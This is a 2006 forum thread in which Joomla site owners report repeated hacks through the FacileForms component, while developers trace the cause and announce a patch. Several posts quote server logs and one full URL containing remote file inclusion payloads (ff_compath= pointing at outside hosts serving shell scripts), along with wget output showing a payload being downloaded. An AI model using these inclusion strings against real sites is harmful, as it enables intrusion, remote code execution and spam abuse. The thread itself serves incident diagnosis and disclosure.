Repeatedly hacked

[formsuser]

Hi all,

I have a Joomla website using the FacileForms component.  It's been hacked three times now, and each time it's been this component.  The first time I took the hint and implemented standard security in line with articles on the Joomla.org website.  The second time I implemented even more security measures and assured the client the site was now as secure as I could make it.  This third time, the host has disabled FacilesForms component directory (see why below) and informed me I should upgrade to the latest version.  I was already using 1.4.6g which is still the latest version. 

So now I'm coming here for some expert assistance.  Here is what my host sent me after the third attack.  I've replaced my website's address with "website.com", the hacker's IP with 111.222.333.444 and my website's IP with 000.000.000.000. 

=====================================================
===============START HOST MESSAGE====================
=====================================================

We need to inform you that your hosting account for website.com has been hacked and used to run illegal software on the server.
 
To prevent further abuse of your account and the server, we have disabled the following location on your account:
 
/www/www/components/com_facileforms
 
Here is how the hackers have exploited your account:
 
111.222.333.444 - - [10/Sep/2006:17:43:52 -0400] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://myspace.si/images/cmd.gif? HTTP/1.1" 200 20 "-" "libwww-perl/5.79"
 
Please check the following process listing for your user:
 
username 24522 9526 0 Sep10 ? SN 0:00 /usr/local/bin/php4.cgi index.php PATH=/usr/local/bin:/usr/bin:/bin DOCUMENT_ROOT=/home/username/www/www HTTP_CONNECTION=close HTTP_HOST=www.website.com HTTP_USER_AGENT=libwww-perl/5.79 REDIRECT_QUERY_STRING=ff_compath=http://myspace.si/images/cmd.gif? REDIRECT_STATUS=200 REDIRECT_URL=/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php REMOTE_ADDR=111.222.333.444 REMOTE_PORT=43405 SCRIPT_FILENAME=/home/username/www/www/index.php SERVER_ADDR=000.000.000.000 SERVER_ADMIN=admin@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_SOFTWARE=Apache GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET QUERY_STRING=ff_compath=http://myspace.si/images/cmd.gif? REQUEST_URI=/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://myspace.si/images/cmd.gif? SCRIPT_NAME=/index.php
 
Please upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.


=====================================================
=================END HOST MESSAGE====================
=====================================================

My questions are: 

What am I doing wrong?  What additional information, if any, is required to determine what I'm doing wrong?  If I'm not doing anything wrong, is this a vulnerability?  If that's the case, was it irresponsible to post it here?? 


Thanks in advance.
formsuser

[schmiro77]

Hello,


In FF 1.4.6g there is no such file 'facileforms.frame.php' anymore.

Therfor just some questions for clarification:

1. Are you shure, that currently you are using FF 1.4.6g ?
2. Are you shure, that at that time, the weblog entries got created, you already used FF 1.4.6g ?
3. Are you shure, that you cleaned up properly you folders and currently there is not such a file 'facileforms.frame.php' ?

Regards
Ralf

[Cilo]

Hello,

I have the same problem on my server.
A joomla website have been hacked 2 times.

Here the log:

a15176468.alturo-server.de - - [16/Sep/2006:05:06:22 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 5 "-" "libwww-perl/5.76"
wpc2239.amenworld.com - - [16/Sep/2006:05:06:31 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 5 "-" "libwww-perl/5.79"
a15176468.alturo-server.de - - [16/Sep/2006:05:09:49 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
a15176468.alturo-server.de - - [16/Sep/2006:05:09:49 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.76"
wpc2239.amenworld.com - - [16/Sep/2006:05:09:49 +0200] "GET /component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://ar.geocities.com/lynxbt1/spread.txt? HTTP/1.1" 200 - "-" "libwww-perl/5.79"

The error log show the download of the script:

--05:04:49--  http://ar.geocities.com/lynxbt1/v6
           => `v6'
--05:04:49--  http://ar.geocities.com/lynxbt1/v6
           => `v6'
--05:04:49--  http://ar.geocities.com/lynxbt1/v6
           => `v6'
Connecting to ar.geocities.com:80... Connecting to ar.geocities.com:80... Connecting to ar.geocities.com:80... connected!
HTTP request sent, awaiting response... connected!
HTTP request sent, awaiting response... connected!
HTTP request sent, awaiting response... 200 OK
Length: 14,917 [text/plain]

    0K ...200 OK
Length: 14,917 [text/plain]

    0K ...200 OK
Length: 14,917 [text/plain]

    0K .......... ......... ......... ....                                       100% @  47.92 KB/s

..                                       100% @  47.61 KB/s

..                                       100% @  47.61 KB/s

05:04:50 (47.76 KB/s) - `v6' saved [14917/14917]

05:04:50 (47.61 KB/s) - `v6' saved [14917/14917]

05:04:50 (47.61 KB/s) - `v6' saved [14917/14917]

I use Facile Form 1.4.6g (seen it in the xml file)
I don't understand how because there is no facileforms.frame.php file in the folder.
After the second hack, I put the security advise "define( 'RG_EMULATION', 0 ); " in global.php, I hope it's the solution

Best Regards,
Cyril

[Makis77]

i m having the same problem as well
i reported that here

http://www.facileforms.biz/forum/index.php/topic,2959.msg10989.html#msg10989


the hack made my mail client go crazy.
I sent about 1500 spam emails to others....and those might be more as i only counted the ones that bounced back.

How can we tell the version we r using?

[fvds]

The FacileForms version is displayed at the top of the configuration screen. It should be 1.4.6....

If you are still beeing hacked, check on your server to see if the file facileforms.frame.php exists. It should not be there, as it's no longer needed in FF 1.4.6.

If it's there, you probalbly didn't follow the upgrade instructions (in the Documentation on the FacileForms.biz site).
If you find the facileforms.frame.php file, delete it!

[fvds]

Are you using a SEF component?

[shumisha]

Please could you update on the status of your site seucrity. Were you all using a properly installed 1.4.6g version of FF ? There are a few reports of these things happening, and I can't figure out whether there is any reality to these, or if it is mostly errors in the upgrade process.

Thakns for any information

[boldee]

The insecurity is due to weaknesess in other components such as SEF, the problems being reported are all related to an ff file that no longer exists in 1.4.6 therefore it is impossible for ff open a backdoor.

[shumisha]

Hello boldee,

Thanks for your answer. I am continuing the contact with the 2 users reporting the issue, to find out about whether they are using an SEF component (which one is causing the issue ?), and more details if not

[shumisha]

Hello all,

just an update. These two users are indeed using open-sef, RC5 sp2. At the moment, I do not have an answer about whether their version is pre or post-security patch released mid-july 06.

[facile]

Currently there is a vulnerability in mod_rewrite under suspect. The hack seems to be possible with any sef, even the one built into joomla according to reports. It is not sure currently if the sef itself is really involved, or only some .htaccess settings which are used/required by most sef's.

[shumisha]

Thanks for this information. Could you provide some link with info about this ?

[dhuelsmann]

I, too, have been hacked three times over the past week and a half. The first time I was not on the current release of facile forms so I cleared out the little surprises the buggers left and uninstalled facile forms and re-installed the latest version. They got to me again and they were using this command

Code:

http://www.mystite.com/index.php/option,com_facileforms/component/option,com_facileforms/components/com_facileforms/facileforms.frame.php?ff_compath=http://see-my-ip.info/cmd.do%3f

Note: Moderators take out anything from above you don't want to show.

I realize you are saying that facileforms.frame.php isn't in the code release but, I know I completely deleted the directory when I upgraded. That command opens the site wide open to upload, download, rename anything anywhere in any directory.

Yes, I do use the core sef. If this is related to the SEF, why aren't they hacking through some other component? I have had to completely remove facile forms to eliminate the hacks. (And I really like this component!)

Regards

Dave

[facile]

Thanks for all the information. I now got access to a server which has this vulnerability and hope to track down how it works today.

UPDATE:

The vulnerability has been identified and there will be a patch for 1.4.6g, as well as a new release of 1.4.7 available in short.

UPDATE:

FacileForms 1.4.7 as well as a patch for 1.4.6 are available now.

[jdog]

holy crap I was shocked when I tried the url on my site.

So why do the SEF components create a vulnerability, and is there any way to still use them while using FF without security risks?